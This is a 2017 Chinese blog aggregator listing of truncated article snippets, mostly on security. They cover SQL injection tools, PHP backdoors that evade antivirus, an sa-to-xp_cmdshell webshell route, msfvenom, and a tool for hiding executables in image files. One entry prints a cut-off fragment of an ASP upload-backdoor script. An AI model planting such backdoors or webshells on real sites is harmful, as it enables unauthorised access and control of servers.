正向代理 A同学在大众创业、万众创新的大时代背景下开启他的创业之路,目前他遇到的最大的一个问题就是启动资金,于是他决定去找马云爸爸借钱,可想而知,最后碰一鼻子灰回来了,情急之下,他想到一个办法,找关系开后门,经过一番消息打探,原来A同学的大学老师王老师是马云的同学,于是A同学找到王老师,托王老师帮忙 ...
分类:
其他好文 时间:
2017-06-02 01:07:15
阅读次数:
291
.比較常见的安全性漏洞: 1、后门,程序猿为了方便自己维护。会留一些后门,但 是easy成为攻击的漏洞。 2、在源码里会有站点地址遗漏。会被黑客利用。绕过防火墙, 直接攻击后台。 3、exceptions,我们在敲代码的时候,难免的一些潜在漏洞,也easy成为被攻击的目标。 几种安全性服务方式和特点 ...
分类:
其他好文 时间:
2017-05-30 18:11:05
阅读次数:
239
MySQL注入工具sqlsus sqlsus是使用Perl语言编写的MySQL注入和接管工具。它可以获取数据库结构,实施注入查询,下载服务器的文件,爬取可写目录并写入后门,以及复制数据库文件等功能。它提供Inband和盲注两种注入模式,获取数据库权限。 使用时,用户首先使用该工具生成一个配置文件。在 ...
分类:
数据库 时间:
2017-05-25 12:00:23
阅读次数:
178
<%ifrequest.QueryString("action")="comeon"then
a=Request.TotalBytes:ifaThenb="adodb.stream":Setc=Createobject(b):c.Type=1:c.Open:c.WriteRequest.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):seth=Createobject(..
分类:
其他好文 时间:
2017-05-18 23:59:44
阅读次数:
334
在php中存在回调函数参数的函数,都有可能作为后门比如array_map,array_filter这类数组操作的回调函数,但是在安全狗下会被杀掉但是uasort这类函数不会被杀掉。php5.4.8之后的assert在5.4.8之后,assert函数由一个参数,变成了两个参数。增加了一个可选参数descrition:5.4.8 ..
分类:
Web程序 时间:
2017-05-16 14:37:06
阅读次数:
177
sa权限获取webshell思路1.通过SQL查询分析器通过sa权限首先恢复xp_cmdshell存储过程。2.通过SQLTools2.0连接数据库,执行命令,查看网站路径以及磁盘文件,获取网站的真实路径。3.echo生成一句话后门。4.直接获取webshell权限。5.如果echo生成的一句话后门无法执行,可以通过查..
分类:
Web程序 时间:
2017-05-15 22:28:14
阅读次数:
163
在这里,要向大家推荐一款名为“Fake Image Exploiter”的安全工具,该工具可以在图片文件中捆绑隐藏的恶意.bat或.exe程序,方便钓鱼或社工攻击测试过程中的入侵控制。如果受害者点击该恶意图片文件后,将会向控制主机反弹一个管理控制会话。以下是其使用视频: (自带梯子) https:/ ...
分类:
其他好文 时间:
2017-05-15 13:05:31
阅读次数:
313
在这里,要向大家推荐一款名为“Fake Image Exploiter”的安全工具,该工具可以在图片文件中捆绑隐藏的恶意.bat或.exe程序,方便钓鱼或社工攻击测试过程中的入侵控制。如果受害者点击该恶意图片文件后,将会向控制主机反弹一个管理控制会话。以下是其使用视频: https://www.yo ...
分类:
其他好文 时间:
2017-05-15 09:49:10
阅读次数:
215
我们的个人信息为什么会被盗呢?原因之一是我们的电脑有漏洞,通俗的说,门窗关闭不严。 默认情况下,Windows有很多端口是开放的,在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑。 为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135、139、445、593、1025 端口 ...
分类:
其他好文 时间:
2017-05-14 00:48:31
阅读次数:
282
MSFVENOM常规选项 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -p ...
分类:
其他好文 时间:
2017-05-10 19:57:14
阅读次数:
614
